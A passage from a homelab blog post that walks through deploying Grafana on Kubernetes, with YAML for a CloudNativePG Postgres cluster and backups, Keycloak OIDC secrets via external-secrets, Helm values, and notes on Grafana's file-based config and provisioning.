<p>First step is to setup the database for Grafana. You can also run it locally,
without an external database. Then, Grafana uses an SQLite DB. But the Postgres
database made more sense to me. This was the first deployment of a production
database with <a href="https://cloudnative-pg.io/">CloudNativePG</a> and looked like this:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span><span style="color:#f92672">apiVersion</span>: <span style="color:#ae81ff">postgresql.cnpg.io/v1</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">kind</span>: <span style="color:#ae81ff">Cluster</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">metadata</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">name</span>: <span style="color:#ae81ff">grafana-pg-cluster</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">labels</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">homelab/part-of</span>: <span style="color:#ae81ff">grafana</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">spec</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">instances</span>: <span style="color:#ae81ff">2</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">imageName</span>: <span style="color:#e6db74">&#34;ghcr.io/cloudnative-pg/postgresql:16.2-10&#34;</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">bootstrap</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">initdb</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">database</span>: <span style="color:#ae81ff">grafana</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">owner</span>: <span style="color:#ae81ff">grafana</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">resources</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">requests</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">memory</span>: <span style="color:#ae81ff">100M</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">cpu</span>: <span style="color:#ae81ff">100m</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">postgresql</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">parameters</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">max_connections</span>: <span style="color:#e6db74">&#34;20&#34;</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">shared_buffers</span>: <span style="color:#e6db74">&#34;25MB&#34;</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">effective_cache_size</span>: <span style="color:#e6db74">&#34;75MB&#34;</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">maintenance_work_mem</span>: <span style="color:#e6db74">&#34;6400kB&#34;</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">checkpoint_completion_target</span>: <span style="color:#e6db74">&#34;0.9&#34;</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">wal_buffers</span>: <span style="color:#e6db74">&#34;768kB&#34;</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">default_statistics_target</span>: <span style="color:#e6db74">&#34;100&#34;</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">random_page_cost</span>: <span style="color:#e6db74">&#34;1.1&#34;</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">effective_io_concurrency</span>: <span style="color:#e6db74">&#34;300&#34;</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">work_mem</span>: <span style="color:#e6db74">&#34;640kB&#34;</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">huge_pages</span>: <span style="color:#e6db74">&#34;off&#34;</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">max_wal_size</span>: <span style="color:#e6db74">&#34;128MB&#34;</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">storage</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">size</span>: <span style="color:#ae81ff">1G</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">storageClass</span>: <span style="color:#ae81ff">rbd-fast</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">backup</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">barmanObjectStore</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">endpointURL</span>: <span style="color:#ae81ff">http://rook-ceph-rgw-rgw-bulk.rook-cluster.svc:80</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">destinationPath</span>: <span style="color:#e6db74">&#34;s3://backup-cnpg/&#34;</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">s3Credentials</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">accessKeyId</span>:
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">name</span>: <span style="color:#ae81ff">rook-ceph-object-user-rgw-bulk-backup-example-user</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">key</span>: <span style="color:#ae81ff">AccessKey</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">secretAccessKey</span>:
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">name</span>: <span style="color:#ae81ff">rook-ceph-object-user-rgw-bulk-backup-example-user</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">key</span>: <span style="color:#ae81ff">SecretKey</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">retentionPolicy</span>: <span style="color:#e6db74">&#34;30d&#34;</span>
</span></span></code></pre></div><p>As before, I determined the <code>spec.postgresql.parameters</code> by plugging my requirements
into <a href="https://pgtune.leopard.in.ua/">PGtune</a>. One important piece is the
<code>storage.size</code> config. I got that value wrong in the beginning, setting it to
only 256 MB. More details can be found in <a href="https://blog.mei-home.net/posts/k8s-migration-8a-pg-problems/">this post</a>.</p>
<p>I also configured backups via my Ceph Rook cluster and had to create an S3 bucket
user like this:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span><span style="color:#f92672">apiVersion</span>: <span style="color:#ae81ff">ceph.rook.io/v1</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">kind</span>: <span style="color:#ae81ff">CephObjectStoreUser</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">metadata</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">name</span>: <span style="color:#ae81ff">backup-example-user</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">spec</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">store</span>: <span style="color:#ae81ff">rgw-bulk</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">clusterNamespace</span>: <span style="color:#ae81ff">rook-cluster</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">displayName</span>: <span style="color:#e6db74">&#34;Backup user for Grafana DB&#34;</span>
</span></span></code></pre></div><p>I also configured scheduled backups for the database:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span><span style="color:#f92672">apiVersion</span>: <span style="color:#ae81ff">postgresql.cnpg.io/v1</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">kind</span>: <span style="color:#ae81ff">ScheduledBackup</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">metadata</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">name</span>: <span style="color:#ae81ff">grafana-pg-backup</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">spec</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">method</span>: <span style="color:#ae81ff">barmanObjectStore</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">immediate</span>: <span style="color:#66d9ef">true</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">schedule</span>: <span style="color:#e6db74">&#34;0 30 1 * * *&#34;</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">backupOwnerReference</span>: <span style="color:#ae81ff">self</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">cluster</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">name</span>: <span style="color:#ae81ff">grafana-pg-cluster</span>
</span></span></code></pre></div><p>And finally, the CloudNativePG operator needs access to the Postgres pods
when using NetworkPolicies:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span><span style="color:#f92672">apiVersion</span>: <span style="color:#e6db74">&#34;cilium.io/v2&#34;</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">kind</span>: <span style="color:#ae81ff">CiliumNetworkPolicy</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">metadata</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">name</span>: <span style="color:#e6db74">&#34;grafana-pg-cluster-allow-operator-ingress&#34;</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">spec</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">endpointSelector</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">matchLabels</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">cnpg.io/cluster</span>: <span style="color:#ae81ff">grafana-pg-cluster</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">ingress</span>:
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">fromEndpoints</span>:
</span></span><span style="display:flex;"><span>      - <span style="color:#f92672">matchLabels</span>:
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">io.kubernetes.pod.namespace</span>: <span style="color:#ae81ff">cnpg-operator</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">app.kubernetes.io/name</span>: <span style="color:#ae81ff">cloudnative-pg</span>
</span></span></code></pre></div><p>With the database finally up and running, and all the kinks worked out, I could
deploy Grafana itself.</p>
<h2 id="grafana-setup">Grafana setup</h2>
<p>Before beginning the Grafana setup itself, I had to go over to Keycloak to add
a new client, as I was changing the Grafana URL as part of the migration.
The Grafana doc has a good example for setting up OIDC <a href="https://grafana.com/docs/grafana/latest/setup-grafana/configure-security/configure-authentication/keycloak/">here</a>,
so I won&rsquo;t go into details.</p>
<p>To supply the OIDC secret and client name to the Grafana deployment, I stored
them in my HashiCorp Vault instance and grabbed them from there via
<a href="https://external-secrets.io/latest/">external-secrets</a>:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span><span style="color:#f92672">apiVersion</span>: <span style="color:#ae81ff">external-secrets.io/v1beta1</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">kind</span>: <span style="color:#ae81ff">ExternalSecret</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">metadata</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">name</span>: <span style="color:#e6db74">&#34;grafana-oauth2-keycloak&#34;</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">labels</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">homelab/part-of</span>: <span style="color:#ae81ff">monitoring</span>
</span></span><span style="display:flex;"><span><span style="color:#f92672">spec</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">secretStoreRef</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">name</span>: <span style="color:#ae81ff">my-vault-store</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">kind</span>: <span style="color:#ae81ff">ClusterSecretStore</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">refreshInterval</span>: <span style="color:#e6db74">&#34;1h&#34;</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">target</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">creationPolicy</span>: <span style="color:#e6db74">&#39;Owner&#39;</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">template</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">metadata</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">labels</span>:
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">homelab/part-of</span>: <span style="color:#ae81ff">monitoring</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">data</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">secret</span>: <span style="color:#e6db74">&#34;{{ .secret }}&#34;</span>
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">client</span>: <span style="color:#e6db74">&#34;{{ .client }}&#34;</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">dataFrom</span>:
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">extract</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">key</span>: <span style="color:#ae81ff">secret/my_kubernetes_secrets/cluster/grafana-oauth2-secrets</span>
</span></span></code></pre></div><p>On to the main event. As noted above, I&rsquo;m deploying the Grafana Helm chart as
a subchart of the kube-prometheus-stack chart, which I used previously to provide
Prometheus already:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span><span style="color:#f92672">grafana</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">enabled</span>: <span style="color:#66d9ef">true</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">defaultDashboardsTimezone</span>: <span style="color:#ae81ff">Europe/Berlin</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">defaultDashboardsEditable</span>: <span style="color:#66d9ef">false</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">sidecar</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">datasources</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">alertmanager</span>:
</span></span><span style="display:flex;"><span>        <span style="color:#f92672">enabled</span>: <span style="color:#66d9ef">false</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">testFramework</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">enabled</span>: <span style="color:#66d9ef">false</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">extraLabels</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">homelab/part-of</span>: <span style="color:#ae81ff">grafana</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">serviceMonitor</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">enabled</span>: <span style="color:#66d9ef">false</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">ingress</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">enabled</span>: <span style="color:#66d9ef">true</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">annotations</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">traefik.ingress.kubernetes.io/router.entrypoints</span>: <span style="color:#ae81ff">secureweb</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">hosts</span>:
</span></span><span style="display:flex;"><span>      - <span style="color:#ae81ff">grafana.example.com</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">resources</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">requests</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">cpu</span>: <span style="color:#ae81ff">250m</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">memory</span>: <span style="color:#ae81ff">256M</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">persistence</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">enabled</span>: <span style="color:#66d9ef">false</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">admin</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">existingSecret</span>: <span style="color:#e6db74">&#34;admin-secret-name&#34;</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">userKey</span>: <span style="color:#ae81ff">user</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">passwordKey</span>: <span style="color:#ae81ff">password</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">extraSecretMounts</span>:
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">oidc-secret</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">secretName</span>: <span style="color:#ae81ff">grafana-oauth2-keycloak</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">mountPath</span>: <span style="color:#ae81ff">/secrets/oauth-keycloak</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">readOnly</span>: <span style="color:#66d9ef">true</span>
</span></span><span style="display:flex;"><span>    - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">db-secret</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">secretName</span>: <span style="color:#ae81ff">grafana-pg-cluster-app</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">mountPath</span>: <span style="color:#ae81ff">/secrets/my-db</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">readOnly</span>: <span style="color:#66d9ef">true</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">datasources</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">datasource.yaml</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">apiVersion</span>: <span style="color:#ae81ff">1</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">editable</span>: <span style="color:#66d9ef">false</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">datasources</span>:
</span></span><span style="display:flex;"><span>        - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">loki-k8s</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">type</span>: <span style="color:#ae81ff">loki</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">access</span>: <span style="color:#ae81ff">proxy</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">url</span>: <span style="color:#ae81ff">http://loki.loki.svc.cluster.local:3100</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">isDefault</span>: <span style="color:#66d9ef">false</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">grafana.ini</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">analytics</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">check_for_updates</span>: <span style="color:#66d9ef">false</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">server</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">root_url</span>: <span style="color:#ae81ff">https://grafana.example.com</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">database</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">type</span>: <span style="color:#ae81ff">postgres</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">host</span>: <span style="color:#e6db74">&#34;$__file{/secrets/my-db/host}:$__file{/secrets/my-db/port}&#34;</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">name</span>: <span style="color:#e6db74">&#34;$__file{/secrets/my-db/dbname}&#34;</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">user</span>: <span style="color:#e6db74">&#34;$__file{/secrets/my-db/user}&#34;</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">password</span>: <span style="color:#e6db74">&#34;$__file{/secrets/my-db/password}&#34;</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">users</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">allow_sign_up</span>: <span style="color:#66d9ef">false</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">log</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">level</span>: <span style="color:#ae81ff">info</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">log.console</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">format</span>: <span style="color:#ae81ff">json</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">alerting</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">enabled</span>: <span style="color:#66d9ef">false</span>
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">auth.generic_oauth</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">enabled</span>: <span style="color:#66d9ef">true</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">name</span>: <span style="color:#ae81ff">Keycloak</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">allow_sign_up</span>: <span style="color:#66d9ef">false</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">skip_org_role_sync</span>: <span style="color:#66d9ef">true</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">client_id</span>: <span style="color:#e6db74">&#34;$__file{/secrets/oauth-keycloak/client}&#34;</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">client_secret</span>: <span style="color:#e6db74">&#34;$__file{/secrets/oauth-keycloak/secret}&#34;</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">scopes</span>: <span style="color:#ae81ff">openid email profile offline_access roles</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">email_attribute_path</span>: <span style="color:#ae81ff">email</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">login_attribute_path</span>: <span style="color:#ae81ff">username</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">name_attribute_path</span>: <span style="color:#ae81ff">full_name</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">auth_url</span>: <span style="color:#ae81ff">https://keycloak.example.com/realms/my-realm/protocol/openid-connect/auth</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">token_url</span>: <span style="color:#ae81ff">https://keycloak.example.com/realms/my-realm/protocol/openid-connect/token</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">api_url</span>: <span style="color:#ae81ff">https://keycloak.example.com/realms/my-realm/protocol/openid-connect/userinfo</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">role_attribute_path</span>: <span style="color:#ae81ff">contains(roles[*], &#39;admin&#39;) &amp;&amp; &#39;Admin&#39; || contains(roles[*], &#39;editor&#39;) &amp;&amp; &#39;Editor&#39; || &#39;Viewer&#39;</span>
</span></span></code></pre></div><p>Let&rsquo;s start with an obvious one: I&rsquo;m yet again disabling alerting and Grafana&rsquo;s
own ServiceMonitor, because I did not want to get bogged down even more in staring
at pretty plots all evening long. &#x1f605;
I&rsquo;ve got the persistence disabled, because I&rsquo;m using a Postgres database. Be
cautious with this - if persistence is disabled and you don&rsquo;t configure an external
database, your Grafana config and dashboards won&rsquo;t survive a Pod restart!</p>
<p>Next, let&rsquo;s look at the <code>admin</code> config. I went with an existing secret here, to
not have to put a password into the Helm chart directly. This password is important,
because it&rsquo;s not just Grafana&rsquo;s initial password, but it&rsquo;s also used by Grafana&rsquo;s
<a href="https://grafana.com/docs/grafana/latest/administration/provisioning/">Provisioning functionality</a>,
for API access. There is also a formatting issue somewhere with the password. If
it contains special characters, you will run into issues with not being able to
log in as the admin, and the dashboard and data source provisioning containers
failing to do their job because they also can&rsquo;t log in. I&rsquo;m not sure which
particular special character Grafana did not like, but logins failed consistently
with my completely randomly generated 100 character password. Switching to a
purely alphanumeric one fixed the issue.</p>
<p>One would think we would have gotten past the &ldquo;Escaping strings is hard!!!&rdquo; phase
of computing by now. &#x1f644;</p>
<p>I will got into the <code>datasources</code> config a bit later when I talk about Grafan&rsquo;s
provisioning capability.</p>
<h3 id="grafana-config">Grafana config</h3>
<p>Now let&rsquo;s have a look at the Grafana config. The first thing to note is the
<code>$__file{&lt;FILEPATH&gt;}</code> syntax. This is a pretty nice Grafana feature. Instead of
having to write things into environment variables, Grafana can read values for
its config from other files. I&rsquo;m using
that for the Postgres database config as well as the OIDC secrets from Keycloak.</p>
<p>When defining a secret to mount, Kubernetes will create one file per property
under the <code>data:</code> key in the secret. My database secret, automatically generated
by CloudNativePG, looks something like this:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span><span style="color:#f92672">data</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">dbname</span>: <span style="color:#ae81ff">grafana</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">host</span>: <span style="color:#ae81ff">grafana-pg-cluster-rw</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">jdbc-uri</span>: <span style="color:#ae81ff">jdbc:postgresql://grafana-pg-cluster-rw:5432/grafana?password=foo&amp;user=grafana</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">password</span>: <span style="color:#ae81ff">foo</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">pgpass</span>: [<span style="color:#ae81ff">...]</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">port</span>: <span style="color:#ae81ff">5432</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">uri</span>: <span style="color:#ae81ff">postgresql://grafana:foo@grafana-pg-cluster-rw:5432/grafana</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">user</span>: <span style="color:#ae81ff">grafana</span>
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">username</span>: <span style="color:#ae81ff">grafana</span>
</span></span></code></pre></div><p>This means that under <code>/secrets/my-db/</code>, where I mounted the secret, I will have
files like <code>dbname</code>, <code>password</code> or <code>uri</code>, which I can then use with the <code>$__file</code>
syntax to put them into Grafans&rsquo;s config file.</p>
<p>One note on the <code>uri</code> which CloudNativePG provides and Grafana generally supports
instead of setting all the options separately: Sadly, the URI as provided by
CloudNativePG gives the DB type as <code>postgresql</code>, but Grafana expects the name to
be <code>postgres</code> instead, spitting out the following error message:</p>
<pre tabindex="0"><code>Error: ✗ failed to connect to database: unknown database type: postgresql
</code></pre><p>So I had to switch to providing the individual config options, which also worked
nicely.</p>
<p>The last interesting thing to note about the config is the <code>grafana.ini.auth.generic_oauth.allow_sign_up</code>
option. This needs to be set to <code>true</code> for your first login with your Keycloak
user, so that Grafana can create the user. After that, it can be disabled.</p>
<h2 id="grafana-provisioning">Grafana provisioning</h2>
<p>Grafana&rsquo;s provisioning functionality was something I hadn&rsquo;t heard about at all
before this migration. In short, instead of defining data sources and dashboards
manually via the UI, you can provide YAML files in a specific format in a specific
directory or call the Grafana API to create them.</p>
<p>I&rsquo;m currently only making use of this in my own config to add my Loki data source:</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span>  <span style="color:#f92672">datasources</span>:
</span></span><span style="display:flex;"><span>    <span style="color:#f92672">datasource.yaml</span>:
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">apiVersion</span>: <span style="color:#ae81ff">1</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">editable</span>: <span style="color:#66d9ef">false</span>
</span></span><span style="display:flex;"><span>      <span style="color:#f92672">datasources</span>:
</span></span><span style="display:flex;"><span>        - <span style="color:#f92672">name</span>: <span style="color:#ae81ff">loki-k8s</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">type</span>: <span style="color:#ae81ff">loki</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">access</span>: <span style="color:#ae81ff">proxy</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">url</span>: <span style="color:#ae81ff">http://loki.loki.svc.cluster.local:3100</span>
</span></span><span style="display:flex;"><span>          <span style="color:#f92672">isDefault</span>: <span style="color:#66d9ef">false</span>
</span></span></code></pre></div><p>This will add the <code>loki-k8s</code> data source, with the given URL. The <code>access</code> config
configures how the data is fetched. <code>proxy</code> configures it so that Grafana fetches
the data, while the alternative <code>direct</code> will have your browser fetch the data.</p>
<p>The same functionality is also used by the <code>kube-prometheus-stack</code> chart to add
the Prometheus instance as a source automatically.</p>
<p>Similarly, dashboards can also be defined in this way. I initially thought that
I would add all my own dashboards this way as well. But then I decided not to.
The reason is in the nature of dashboards, especially when compared to data
sources: I will be changing dashboards relatively often, and might just make
occasional, spur of the moment changes. When there&rsquo;s a dashboard which is supplied
via provisioning, Grafana will always override the version from the database with
the provisioned version. That means, whenever I do a change, I would need to
export the dashboard and put it under version control. That seemed just a bit
too much hassle.</p>
<p>The difference I see to data sources is that with dashboards, I will only ever
change them in the UI. Editing the text version by hand just isn&rsquo;t an option.
In contrast, I don&rsquo;t have to see what they look like or extensively test data
sources. I define them once, and then they will remain untouched until the next
big Homelab migration.
But perhaps Grafana will come up with a good UX to push UI changes back to
provisioned dashboards. I would use it in a heartbeat.</p>
<p>One place where provisioned dashboards are pretty nice is when other Helm charts
bring their own dashboards out of the box, like kube-prometheus-stack does.</p>
<h2 id="migrating-the-dashboards">Migrating the dashboards</h2>
<p>After the new Grafana instance was finally up and running, I started migrating
over my dashboards. The first one I did was the Ceph dashboard. At the same time,
I enabled metrics gathering for my Rook cluster. Enabling metrics was as simple
as adding the following to the <code>values.yaml</code> file for the Cluster chart (not the
operator chart!):</p>
<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-yaml" data-lang="yaml"><span style="display:flex;"><span><span style="color:#f92672">monitoring</span>:
</span></span><span style="display:flex;"><span>  <span style="color:#f92672">enabled</span>: <span style="color:#66d9ef">true</span>
